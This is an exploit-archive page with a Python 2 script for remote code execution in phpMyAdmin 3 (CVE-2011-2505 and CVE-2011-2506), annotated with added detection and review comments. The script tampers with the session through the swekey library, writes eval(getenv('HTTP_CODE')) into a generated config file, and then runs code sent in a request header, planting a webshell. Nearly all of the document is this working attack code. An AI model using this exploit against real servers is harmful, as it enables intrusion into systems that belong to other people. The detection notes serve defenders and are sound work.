
phpMyAdmin3 Remote Code Execution

2011-07-0900:00:00
wofeiwo
packetstormsecurity.com
45

EPSS

0.199

Percentile

96.3%

`#!/usr/bin/env python  
# coding=utf-8  
# pma3 - phpMyAdmin3 remote code execute exploit  
# Author: wofeiwo<[email protected]>  
# Thx Superhei  
# Tested on: 3.1.1, 3.2.1, 3.4.3  
# CVE: CVE-2011-2505, CVE-2011-2506  
# Date: 2011-07-08  
# Have fun, DO *NOT* USE IT TO DO BAD THING.  
################################################  
  
# Requirements: 1. "config" directory must be created and writable in the pma directory.  
# 2. session.auto_start = 1 in php.ini configuration.  
  
  
import os,sys,urllib2,re  
  
def usage(program):  
# Print the banner and invocation hint, then exit; `program` is argv[0].
# The banner names the releases that carry the fix (3.3.10.2 / 3.4.3.1 per the
# banner text); that is the version check a defender wants to run against an
# exposed instance.
# NOTE(review): the banner literal is wrapped across two lines by the page as
# rendered; the listing is kept as rendered.
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code  
execute exploit"  
print "Usage: %s <PMA_url>" % program  
print "Example: %s http://www.test.com/phpMyAdmin" % program  
sys.exit(0)  
  
def main(args):  
# Entry point; `args` is sys.argv. Python 2 only (print statements, `except Exception, e`).
# Runs four HTTP steps against the base URL in args[1]. The original step comments
# were mojibake in this copy; each has been reconstructed from the print statement
# that follows it and is marked as such. Each step's request is a concrete thing a
# web-server log or WAF rule can match on, see the inline notes.
try:  
if len(args) < 2:  
usage(args[0])  
  
# Drop a trailing slash so the paths below can be appended verbatim.
if args[1][-1] == "/":  
args[1] = args[1][:-1]  
  
# Step 1 (reconstructed): fetch index.php and scrape the form token and the
# phpMyAdmin session id; the same id is reused as PHPSESSID in the cookie below.
print "[+] Trying get form token&session_id.."  
content = urllib2.urlopen(args[1]+"/index.php").read()  
r1 = re.findall("token=(\w{32})", content)  
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)  
  
# Fallback: the values may be in hidden form fields rather than in a query string.
if not r1:  
r1 = re.findall("token\" value=\"(\w{32})\"", content)  
if not r2:  
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)  
if len(r1) < 1 or len(r2) < 1:  
print "[-] Cannot find form token and session id...exit."  
# SystemExit is not a subclass of Exception (Python 2.5+), so the broad
# handler at the bottom does not swallow this exit.
sys.exit(-1)  
  
token = r1[0]  
sessionid = r2[0]  
print "[+] Token: %s , SessionID: %s" % (token, sessionid)  
  
# Step 2 (reconstructed): a GET to the Swekey auth helper with `session_to_unset`
# and `_SESSION[...]` query parameters, i.e. the session-manipulation issue listed
# as CVE-2011-2505 in the header. The two _SESSION keys plant a comment break-out
# plus eval(getenv('HTTP_CODE')) as a server name, presumably so that it is written
# into the generated config file by step 3 (CVE-2011-2506 per the header).
# Detection: a direct request for libraries/auth/swekey/swekey.auth.lib.php, and in
# particular one carrying session_to_unset or "_SESSION[" in the query string, is
# worth alerting on; normal clients never request that library file.
print "[+] Trying to insert payload in $_SESSION.."  
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"  
url = args[1]+uri  
  
# The opener is installed globally, so this Cookie header rides on every later
# urlopen() call too. `%%3D` is a literal "%3D" after %-formatting.
# NOTE(review): the Cookie literal is wrapped across three lines by the page as
# rendered; the listing is kept as rendered.
opener = urllib2.build_opener()  
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;  
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %  
(sessionid, sessionid)))  
urllib2.install_opener(opener)  
urllib2.urlopen(url)  
  
# Step 3 (reconstructed): POST the setup form's "Save" action so the config file
# is (re)written from the tampered session. This needs the writable config/
# directory named in requirement 1 of the header; deleting setup/ and config/
# after installation (the standard post-install advice) removes this step entirely.
# Detection: any POST to setup/config.php on a production instance.
print "[+] Trying get webshell.."  
# NOTE(review): the POST body literal is wrapped across three lines by the page
# as rendered; the listing is kept as rendered.
postdata =  
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"  
% (sessionid, token)  
url = args[1]+"/setup/config.php"  
  
# print "[+]Postdata: %s" % postdata  
# Passing a data argument turns this urlopen() into a POST.
urllib2.urlopen(url, postdata)  
print "[+] All done, pray for your lucky!"  
  
# Step 4 (reconstructed): request the written config file with a `Code` request
# header; the eval(getenv('HTTP_CODE')) planted in step 2 reads that header back
# through the CGI environment. The same opener from step 2 is extended, so the
# Cookie is still sent. Detection: a request header named "Code" on any request
# to config/config.inc.php; a reachable config/config.inc.php is itself a finding.
url = args[1]+"/config/config.inc.php"  
opener.addheaders.append(('Code', 'phpinfo();'))  
urllib2.install_opener(opener)  
print "[+] Trying connect shell: %s" % url  
# Scrapes the "System" row of the phpinfo() output as proof of execution.
# NOTE(review): the regex literal is wrapped across two lines by the page as
# rendered; the listing is kept as rendered.
result = re.findall("System \</td\>\<td  
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())  
if len(result) == 1:  
print "[+] Lucky u! System info: %s" % result[0]  
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"  
  
else:  
print "[-] Cannot get webshell."  
  
# Broad catch: any URLError/HTTPError or regex problem from any step is printed
# without saying which step failed.
except Exception, e:  
print e  
  
# Script entry; argv is passed through so main() reads the base URL from args[1].
if __name__ == "__main__" : main(sys.argv)  
  
`